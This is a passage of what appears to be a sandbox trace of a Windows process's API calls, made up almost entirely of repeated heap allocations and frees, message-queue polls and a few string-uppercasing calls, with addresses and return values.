RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a744c0 [0103.798] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0103.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0103.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0103.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0103.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0103.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0103.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0103.799] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0103.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0103.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0103.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0103.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0103.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0103.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0103.799] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0103.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0103.799] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0103.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0103.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0103.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0103.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0103.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0103.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0103.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0103.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0103.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0103.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0103.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0103.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0103.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0103.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0103.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0103.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0103.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74700 [0103.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f28 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0103.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c58 [0103.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c40 [0103.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0103.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0103.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0103.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0103.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0103.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0103.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0103.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0103.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74700 | out: hHeap=0x2af0000) returned 1 [0103.802] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a744c0 | out: hHeap=0x2af0000) returned 1 [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.802] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0103.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0103.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0103.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0103.802] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0103.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0103.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748f8 [0103.802] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0103.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0103.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0103.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0103.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0103.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0103.802] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0103.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0103.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0103.803] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0103.803] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0103.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0103.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0103.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0103.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748f8 | out: hHeap=0x2af0000) returned 1 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0103.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0103.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0103.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0103.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0103.804] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0103.804] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743a0 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.804] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0103.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0103.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0103.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0103.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0103.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0103.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0103.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0103.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0103.805] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0103.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0103.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0103.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0103.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0103.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0103.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0103.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 